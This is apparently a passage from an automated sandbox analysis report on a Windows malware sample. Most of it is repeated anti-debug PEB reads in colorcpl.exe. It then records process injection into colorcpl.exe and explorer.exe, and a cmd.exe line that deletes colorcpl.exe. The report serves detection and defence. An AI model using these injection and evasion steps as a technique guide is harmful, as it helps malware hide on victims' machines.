          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECB260 mov eax, dword ptr fs:[00000030h]1_2_06ECB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECB260 mov eax, dword ptr fs:[00000030h]1_2_06ECB260
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8A62 mov eax, dword ptr fs:[00000030h]1_2_06EE8A62
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5927A mov eax, dword ptr fs:[00000030h]1_2_06E5927A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]1_2_06E19240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]1_2_06E19240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]1_2_06E19240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19240 mov eax, dword ptr fs:[00000030h]1_2_06E19240
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDEA55 mov eax, dword ptr fs:[00000030h]1_2_06EDEA55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EA4257 mov eax, dword ptr fs:[00000030h]1_2_06EA4257
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E54A2C mov eax, dword ptr fs:[00000030h]1_2_06E54A2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E54A2C mov eax, dword ptr fs:[00000030h]1_2_06E54A2C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E28A0A mov eax, dword ptr fs:[00000030h]1_2_06E28A0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]1_2_06E15210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov ecx, dword ptr fs:[00000030h]1_2_06E15210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]1_2_06E15210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]1_2_06E15210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AA16 mov eax, dword ptr fs:[00000030h]1_2_06E1AA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AA16 mov eax, dword ptr fs:[00000030h]1_2_06E1AA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAA16 mov eax, dword ptr fs:[00000030h]1_2_06EDAA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAA16 mov eax, dword ptr fs:[00000030h]1_2_06EDAA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E33A1C mov eax, dword ptr fs:[00000030h]1_2_06E33A1C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3DBE9 mov eax, dword ptr fs:[00000030h]1_2_06E3DBE9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov ecx, dword ptr fs:[00000030h]1_2_06EC23E3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov ecx, dword ptr fs:[00000030h]1_2_06EC23E3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov eax, dword ptr fs:[00000030h]1_2_06EC23E3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E953CA mov eax, dword ptr fs:[00000030h]1_2_06E953CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E953CA mov eax, dword ptr fs:[00000030h]1_2_06E953CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]1_2_06E44BAD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]1_2_06E44BAD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]1_2_06E44BAD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE5BA5 mov eax, dword ptr fs:[00000030h]1_2_06EE5BA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED138A mov eax, dword ptr fs:[00000030h]1_2_06ED138A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECD380 mov ecx, dword ptr fs:[00000030h]1_2_06ECD380
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E21B8F mov eax, dword ptr fs:[00000030h]1_2_06E21B8F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E21B8F mov eax, dword ptr fs:[00000030h]1_2_06E21B8F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]1_2_06E4138B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]1_2_06E4138B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]1_2_06E4138B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42397 mov eax, dword ptr fs:[00000030h]1_2_06E42397
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4B390 mov eax, dword ptr fs:[00000030h]1_2_06E4B390
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1DB60 mov ecx, dword ptr fs:[00000030h]1_2_06E1DB60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E43B7A mov eax, dword ptr fs:[00000030h]1_2_06E43B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E43B7A mov eax, dword ptr fs:[00000030h]1_2_06E43B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1DB40 mov eax, dword ptr fs:[00000030h]1_2_06E1DB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8B58 mov eax, dword ptr fs:[00000030h]1_2_06EE8B58
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1F358 mov eax, dword ptr fs:[00000030h]1_2_06E1F358
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED131B mov eax, dword ptr fs:[00000030h]1_2_06ED131B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]1_2_06E140E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]1_2_06E140E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]1_2_06E140E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B8E4 mov eax, dword ptr fs:[00000030h]1_2_06E3B8E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B8E4 mov eax, dword ptr fs:[00000030h]1_2_06E3B8E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E158EC mov eax, dword ptr fs:[00000030h]1_2_06E158EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov ecx, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E590AF mov eax, dword ptr fs:[00000030h]1_2_06E590AF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov ecx, dword ptr fs:[00000030h]1_2_06E4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov eax, dword ptr fs:[00000030h]1_2_06E4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov eax, dword ptr fs:[00000030h]1_2_06E4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19080 mov eax, dword ptr fs:[00000030h]1_2_06E19080
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93884 mov eax, dword ptr fs:[00000030h]1_2_06E93884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93884 mov eax, dword ptr fs:[00000030h]1_2_06E93884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE1074 mov eax, dword ptr fs:[00000030h]1_2_06EE1074
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2073 mov eax, dword ptr fs:[00000030h]1_2_06ED2073
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E30050 mov eax, dword ptr fs:[00000030h]1_2_06E30050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E30050 mov eax, dword ptr fs:[00000030h]1_2_06E30050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]1_2_06E2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]1_2_06E2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]1_2_06E2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]1_2_06E2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]1_2_06E4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]1_2_06E4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]1_2_06E4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]1_2_06E4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]1_2_06E4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]1_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]1_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]1_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]1_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE4015 mov eax, dword ptr fs:[00000030h]1_2_06EE4015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE4015 mov eax, dword ptr fs:[00000030h]1_2_06EE4015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]1_2_06E97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]1_2_06E97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]1_2_06E97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]1_2_06E1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]1_2_06E1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]1_2_06E1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EA41E8 mov eax, dword ptr fs:[00000030h]1_2_06EA41E8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E461A0 mov eax, dword ptr fs:[00000030h]1_2_06E461A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E461A0 mov eax, dword ptr fs:[00000030h]1_2_06E461A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]1_2_06ED49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]1_2_06ED49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]1_2_06ED49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]1_2_06ED49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E969A6 mov eax, dword ptr fs:[00000030h]1_2_06E969A6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]1_2_06E951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]1_2_06E951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]1_2_06E951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]1_2_06E951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3C182 mov eax, dword ptr fs:[00000030h]1_2_06E3C182
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A185 mov eax, dword ptr fs:[00000030h]1_2_06E4A185
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42990 mov eax, dword ptr fs:[00000030h]1_2_06E42990
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1C962 mov eax, dword ptr fs:[00000030h]1_2_06E1C962
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B171 mov eax, dword ptr fs:[00000030h]1_2_06E1B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B171 mov eax, dword ptr fs:[00000030h]1_2_06E1B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B944 mov eax, dword ptr fs:[00000030h]1_2_06E3B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B944 mov eax, dword ptr fs:[00000030h]1_2_06E3B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov ecx, dword ptr fs:[00000030h]1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4513A mov eax, dword ptr fs:[00000030h]1_2_06E4513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4513A mov eax, dword ptr fs:[00000030h]1_2_06E4513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]1_2_06E19100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]1_2_06E19100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]1_2_06E19100
          Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 1_2_06E596E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_06E596E0

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\colorcpl.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 870000
          Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Users\user\Desktop\0321423605241625.exe Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 10410000
          Source: C:\Users\user\Desktop\0321423605241625.exe Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 4A80000
          Source: C:\Users\user\Desktop\0321423605241625.exe Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 4FA0000
          Source: C:\Users\user\Desktop\0321423605241625.exe Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 10410000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\0321423605241625.exe Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 4A80000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\0321423605241625.exe Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 4FA0000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\0321423605241625.exe Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 10410000 value starts with: 4D5A
          Source: C:\Windows\SysWOW64\colorcpl.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 3324
          Source: C:\Users\user\Desktop\0321423605241625.exe Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 4FA0000
          Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
          Source: explorer.exe, 00000002.00000000.333633898.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.387636315.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.351540998.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434029800.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.309952416.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanLoc*U
